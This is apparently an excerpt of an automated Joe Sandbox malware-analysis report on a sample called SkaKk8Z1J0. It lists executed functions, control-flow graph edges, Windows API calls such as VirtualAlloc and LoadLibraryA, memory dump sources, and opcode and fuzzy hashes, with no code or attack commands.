                                                                                                                                                                                                                                                  control_flow_graph 162 40b44c-40b453 163 40b4c0 162->163 164 40b7e0-40b7f0 162->164 165 40b4e4 162->165 166 40b4c6-40b4dd 162->166 167 40b7a7-40b7b1 162->167 168 40b4ae 162->168 169 40b4f1-40b502 162->169 170 40b4b4 162->170 171 40b6d7-40b6f5 162->171 172 40b797-40b7a0 162->172 173 40b7f7-40b804 162->173 174 40b738-40b756 162->174 175 40b7b8-40b7d9 162->175 176 40b45a-40b467 162->176 163->166 164->173 178 40b6c6-40b6cf 164->178 179 40b588 164->179 180 40b80b 164->180 181 40b60c 164->181 182 40b48c-40b490 164->182 183 40b58e-40b5af 164->183 184 40b650-40b65f call 43a950 164->184 185 40b811-40b82b call 43c280 164->185 186 40b854-40b85d 164->186 187 40b5d5-40b5dc 164->187 188 40b697-40b699 164->188 189 40b620-40b627 164->189 190 40b4a0-40b4a6 164->190 191 40b862 164->191 192 40b662-40b670 call 43a950 164->192 193 40b6a4-40b6c5 164->193 194 40b46e-40b483 call 43c280 164->194 195 40b870-40b880 164->195 196 40b630-40b634 164->196 197 40b5f0-40b605 164->197 198 40b570-40b575 164->198 199 40b5b0-40b5cd 164->199 200 40b830-40b84c call 43c280 164->200 201 40b679 164->201 202 40b63b-40b63f 164->202 203 40b57c-40b57f 164->203 204 40b67e-40b695 call 43c280 164->204 165->169 166->164 166->165 166->167 166->169 166->171 166->172 166->173 166->174 166->175 166->178 166->179 166->180 166->181 166->182 166->183 166->184 166->185 166->186 166->187 166->188 166->189 166->190 166->191 166->192 166->193 166->194 166->195 166->196 166->197 166->198 166->199 166->200 166->201 166->202 166->203 166->204 167->175 167->182 167->188 167->190 167->193 167->194 167->204 168->170 205 40b510-40b562 169->205 170->163 206 40b700-40b71c 171->206 172->164 172->167 172->173 172->175 172->178 172->179 172->180 172->181 172->182 172->183 172->184 172->185 172->186 172->187 172->188 172->189 172->190 172->191 172->192 172->193 172->194 172->195 172->196 172->197 172->198 172->199 172->200 172->201 172->202 172->203 172->204 173->180 173->182 173->185 173->186 173->188 173->190 173->193 173->194 173->200 173->204 177 40b760-40b77c 174->177 175->164 175->173 175->178 175->179 175->180 175->181 175->182 175->183 175->184 175->185 175->186 175->187 175->188 175->189 175->190 175->191 175->192 175->193 175->194 175->195 175->196 175->197 175->198 175->199 175->200 175->201 175->202 175->203 175->204 176->182 176->190 176->193 176->194 177->177 213 40b77e-40b792 177->213 178->171 181->189 182->190 183->199 184->192 185->200 210 40b69b 186->210 187->180 187->182 187->185 187->186 187->188 187->190 187->193 187->194 187->197 187->200 187->201 187->203 187->204 188->210 189->179 189->180 189->182 189->183 189->185 189->186 189->187 189->188 189->190 189->193 189->194 189->196 189->198 189->199 189->200 189->201 189->203 189->204 190->168 192->201 194->182 196->202 197->179 197->180 197->181 197->182 197->183 197->184 197->185 197->186 197->187 197->188 197->189 197->190 197->192 197->193 197->194 197->198 197->199 197->200 197->201 197->203 197->204 198->180 198->182 198->185 198->186 198->188 198->190 198->193 198->194 198->200 198->201 198->203 198->204 199->187 200->186 201->204 220 40b646 202->220 203->179 204->188 205->205 215 40b564-40b567 205->215 206->206 212 40b71e-40b732 206->212 210->193 212->174 213->171 215->198 220->184
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: h d"
                                                                                                                                                                                                                                                  • API String ID: 0-862628183
                                                                                                                                                                                                                                                  • Opcode ID: 907832ec394077f3cb61ce921fa134c81a3c0afbaec0ddbe82e25e94bded95fe
                                                                                                                                                                                                                                                  • Instruction ID: e7b26040d347b48bd15f509a2e92d141a5522c4f34e33ed28b849909e17f734e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 907832ec394077f3cb61ce921fa134c81a3c0afbaec0ddbe82e25e94bded95fe
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81B1CF79204700CFD3248F74EC91B67B7F6FB4A301F058A7DE99682AA0D774A859CB18
                                                                                                                                                                                                                                                  Function 0043A9B0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 254 43a9b0-43a9e2 LdrInitializeThunk
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LdrInitializeThunk.NTDLL(0043C978,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A9DE
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                  • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                  • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                                  Function 0043CD60 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID: ihgf
                                                                                                                                                                                                                                                  • API String ID: 2994545307-2948842496
                                                                                                                                                                                                                                                  • Opcode ID: dc78d9af145ba0afec033d80e05627e4c530122498a0d20b58ff3d4b62c44d01
                                                                                                                                                                                                                                                  • Instruction ID: fada9a9e4b2345b6e6448840249a942183f34978708c931c01a97142677ee2ca
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc78d9af145ba0afec033d80e05627e4c530122498a0d20b58ff3d4b62c44d01
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C31F434304300AFE7109B249CC2B7BBBA5EB8EB14F24653DF584A3391D265EC60874A
                                                                                                                                                                                                                                                  Function 0043B05B Relevance: .1, Instructions: 136COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 4b87544a561184a7d4b1543d2ac67acc99fdb29ef1ee15d58e3a116105f186d8
                                                                                                                                                                                                                                                  • Instruction ID: 59f44d745d542156a41113c6a864a29fdb0868418a705d17f35015423a5ff240
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b87544a561184a7d4b1543d2ac67acc99fdb29ef1ee15d58e3a116105f186d8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F418C76A587588FC724AF54ACC477BB3A1EB8A320F2E552DDAE517351E7648C0083CD
                                                                                                                                                                                                                                                  Function 0040BDC9 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
                                                                                                                                                                                                                                                  • Instruction ID: 5bf83162093d809aa6a095f83f940cb60b386281fae2fad957a8694bd2eb5c71
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3911E071608341ABD7149F29DD9067FBBE2EBC2354F14AE2CE59253790C630C841CB4A
                                                                                                                                                                                                                                                  Function 0074003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 0 74003c-740047 1 74004c-740263 call 740a3f call 740e0f call 740d90 VirtualAlloc 0->1 2 740049 0->2 17 740265-740289 call 740a69 1->17 18 74028b-740292 1->18 2->1 23 7402ce-7403c2 VirtualProtect call 740cce call 740ce7 17->23 20 7402a1-7402b0 18->20 22 7402b2-7402cc 20->22 20->23 22->20 29 7403d1-7403e0 23->29 30 7403e2-740437 call 740ce7 29->30 31 740439-7404b8 VirtualFree 29->31 30->29 33 7405f4-7405fe 31->33 34 7404be-7404cd 31->34 37 740604-74060d 33->37 38 74077f-740789 33->38 36 7404d3-7404dd 34->36 36->33 42 7404e3-740505 LoadLibraryA 36->42 37->38 43 740613-740637 37->43 40 7407a6-7407b0 38->40 41 74078b-7407a3 38->41 44 7407b6-7407cb 40->44 45 74086e-7408be LoadLibraryA 40->45 41->40 46 740517-740520 42->46 47 740507-740515 42->47 48 74063e-740648 43->48 49 7407d2-7407d5 44->49 52 7408c7-7408f9 45->52 50 740526-740547 46->50 47->50 48->38 51 74064e-74065a 48->51 53 740824-740833 49->53 54 7407d7-7407e0 49->54 55 74054d-740550 50->55 51->38 56 740660-74066a 51->56 57 740902-74091d 52->57 58 7408fb-740901 52->58 64 740839-74083c 53->64 59 7407e4-740822 54->59 60 7407e2 54->60 61 740556-74056b 55->61 62 7405e0-7405ef 55->62 63 74067a-740689 56->63 58->57 59->49 60->53 65 74056d 61->65 66 74056f-74057a 61->66 62->36 67 740750-74077a 63->67 68 74068f-7406b2 63->68 64->45 69 74083e-740847 64->69 65->62 71 74057c-740599 66->71 72 74059b-7405bb 66->72 67->48 73 7406b4-7406ed 68->73 74 7406ef-7406fc 68->74 75 740849 69->75 76 74084b-74086c 69->76 83 7405bd-7405db 71->83 72->83 73->74 77 7406fe-740748 74->77 78 74074b 74->78 75->45 76->64 77->78 78->63 83->55
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0074024D
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                  • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                  • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                  • Instruction ID: 4e37773463db04960ea610d5de5676e08d2a9b3ebfc9bb26bbd888d8c2496cbd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2527874A00229DFDB64CF68C984BA8BBB1BF09304F1480D9E90DAB251DB34AE94DF55
                                                                                                                                                                                                                                                  Function 0043AB0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 123 43ab0b-43ab1f 124 43ab20-43ab7b 123->124 124->124 125 43ab7d-43abce GetForegroundWindow call 43c7d0 124->125
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 0043AB9F
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ForegroundWindow
                                                                                                                                                                                                                                                  • String ID: ilmn
                                                                                                                                                                                                                                                  • API String ID: 2020703349-1560153188
                                                                                                                                                                                                                                                  • Opcode ID: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
                                                                                                                                                                                                                                                  • Instruction ID: 381210f78ea322f673374cf03a2ab6eba84d6d5afac1efb59df7821204f613f6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0115C3BE5A65087D304DB65D806156B293EAC5214F0DD53DC986D770AEF3DDC028286
                                                                                                                                                                                                                                                  Function 00740E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 142 740e0f-740e24 SetErrorMode * 2 143 740e26 142->143 144 740e2b-740e2c 142->144 143->144
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00000400,?,?,00740223,?,?), ref: 00740E19
                                                                                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00000000,?,?,00740223,?,?), ref: 00740E1E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                                                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                  • Instruction ID: 0d95ee2dc00d02904126902d519ad7257b8297a6f4be405c0843031f0b165e47
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03D0123114512877D7003A94DC09BCD7B1CDF05B62F008411FB0DD9080C774994046E5
                                                                                                                                                                                                                                                  Function 0043A950 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 238 43a950-43a961 239 43a976-43a988 call 43bf00 RtlReAllocateHeap 238->239 240 43a995-43a996 call 438e70 238->240 241 43a98a-43a993 call 438e30 238->241 242 43a968-43a96f 238->242 249 43a9a0-43a9a2 239->249 248 43a99b-43a99e 240->248 241->249 242->239 242->240 248->249
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B65C,00000000,?), ref: 0043A982
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                  • Opcode ID: 2eba5718b67ec1480271e2bf1c34f5bd19b8968588a838e869f4d5b9ea06510f
                                                                                                                                                                                                                                                  • Instruction ID: 722538be6ec62bdfb2320af1aff19aeee9eb7e72755357ed04131fae2c05cc9a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2eba5718b67ec1480271e2bf1c34f5bd19b8968588a838e869f4d5b9ea06510f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99E0E576414611FBC6001B24BC06B1B3665AF8A721F02183AF440E6115DA38E811859F
                                                                                                                                                                                                                                                  Function 0043AB91 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 250 43ab91-43aba8 GetForegroundWindow call 43c7d0 253 43abad-43abce 250->253
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 0043AB9F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ForegroundWindow
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2020703349-0
                                                                                                                                                                                                                                                  • Opcode ID: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
                                                                                                                                                                                                                                                  • Instruction ID: 60e8b0f46bfb036eff5fe615915129b1fb2bd173e47bf556a6606a5c449cc706
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34E08C7EA406008BDB04DF20EC4A5517766B79A305B084039D903C37A6DB3DD816CA49
                                                                                                                                                                                                                                                  Function 00438E70 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 255 438e70-438e7c 256 438e83-438e8e call 43bf00 RtlFreeHeap 255->256 257 438e94-438e95 255->257 256->257
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(?,00000000,?,004127C7), ref: 00438E8E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                                                                                                                  • Opcode ID: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
                                                                                                                                                                                                                                                  • Instruction ID: 85901e1c641484a1e9593b863e702362ecf9fc70d5eef9c3d2e46bbe4163b786
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 63D01235405526EBC6101F24FC06B863A54EF49321F030461B540AF076C734DC908AD8
                                                                                                                                                                                                                                                  Function 00438E47 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 260 438e47-438e4a 261 438e51-438e55 RtlAllocateHeap 260->261
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                  • Opcode ID: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
                                                                                                                                                                                                                                                  • Instruction ID: 4c59684187f8c9fc8ebab3782fe1e1f4842940d007367fb0e8ab7bd4dbd8a192
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0C0927C142211FBD2211B21AC5EF6B3E38FB83B63F104124F209580B287649011DA6E
                                                                                                                                                                                                                                                  Function 00438E51 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                  • Opcode ID: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
                                                                                                                                                                                                                                                  • Instruction ID: 3dd49d49275fbb255d04589a33f94784ad2ffd24471d3276aa8c957077778349
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8AA0223C002200EBC2200B20AC0EF2B3E38FB83B23F000030F00C080B283308000CA2E
                                                                                                                                                                                                                                                  Function 00540465 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005404B6
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724928073.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_540000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                  • Instruction ID: 50dd362a1b8c8ae9f1864809fe64922e881f4706fdd5c4cbaf7c294925ff0706
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B112B79A40208EFDB01DF98C985E98BFF5AF08350F158094FA489B362D375EA50DF80

                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                  Function 00774891 Relevance: 127.9, Strings: 102, Instructions: 417COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
